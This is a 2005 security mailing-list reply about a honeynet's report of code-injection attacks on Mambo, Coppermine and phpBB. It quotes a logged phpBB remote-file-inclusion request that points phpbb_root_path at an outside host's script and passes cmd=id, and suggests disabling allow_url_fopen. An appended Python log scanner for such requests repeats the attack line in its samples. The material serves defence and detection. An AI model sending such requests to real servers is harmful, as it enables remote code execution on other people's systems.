WebApp Sec mailing list archives
Re: Mambo, Coppermine and PHPBB Attacks
From: Paul Laudanski <zx () castlecops com>
Date: Mon, 19 Dec 2005 18:24:14 -0500 (EST)
On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:
> Our honeynet has been picking up an increase in the number of code injection attacks in the past few days. Attacks are primarily directed to several popular open source applications: Mambo, Coppermine and PHPBB.
>
> Analysis: http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17

Nice catch. I checked my logs and found these, which appear to be the valid phpbb injection request:

81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"

Notice the admin_styles.php is written out once. I would suspect that disabling the allow_url_fopen directive in php.ini would prevent such a request from executing. This would prevent resources other than files from being included. But I haven't tested.

--
Paul Laudanski, Microsoft MVP Windows-Security
[cal] http://events.castlecops.com
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com
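
A log check for the request pattern in the message above, as an added example that is not part of the original post or thread: it scans access-log lines for query parameters whose decoded value begins with a remote URL. The second and third sample lines, the `root_path` parameter, the `/gallery/init.php` script and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Client IP and request target from a common/combined-format access-log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)')
# A path-style parameter should never carry a value that starts with a remote scheme.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

SAMPLE_LOG = [
    # Request line quoted in the post.
    '81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/'
    'admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"',
    # Constructed: ordinary forum request, no URL-valued parameter.
    '192.0.2.10 - - [19/Dec/2005:07:21:02 -0500] "GET /modules/Forums/viewtopic.php?t=42&ref=forum HTTP/1.1" 200 5120',
    # Constructed: same pattern with the URL percent-encoded (hypothetical script and parameter).
    '192.0.2.77 - - [19/Dec/2005:07:25:41 -0500] "GET /gallery/init.php?root_path=http%3A%2F%2Fhost.example%2Fx.txt HTTP/1.0" 404 312',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded URLs are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(log_lines):
    """Return (client_ip, script_path, parameter, value) for every query
    parameter whose decoded value begins with a remote URL."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log entry
        path, _, query = m.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)
            if REMOTE_VALUE_RE.match(value):
                hits.append((m.group("ip"), path, name, value))
    return hits

if __name__ == "__main__":
    for ip, path, name, value in find_remote_includes(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value}")
```

Parameters that legitimately carry URLs, such as redirect targets, also match, so hits are candidates for review rather than confirmed injection attempts.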